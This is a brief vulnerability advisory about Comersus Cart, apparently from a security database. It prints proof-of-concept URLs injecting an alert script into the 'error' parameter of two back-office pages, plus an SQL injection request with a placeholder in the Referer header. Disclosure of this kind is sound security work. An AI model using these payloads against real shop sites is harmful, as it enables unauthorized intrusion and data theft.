|
Comersus Cart Multiple Vulnerabilities
No exploit is required for any of the issues. The following proof of concepts are available for the cross-site scripting issue: http://www.example.com/comersus/backofficelite/comersus_supportError.asp?error=<script>alert('hi%20mum');</script> http://www.example.com/comersus/backofficelite/comersus_backofficelite_supportError.asp?error=<script>alert('hi%20mum');</script> The following proof of concept is available for the SQL injection issue: GET /comersus/store/default.asp HTTP/1.1 Referer: <SQLCODE HERE> |
|
|
Privacy Statement |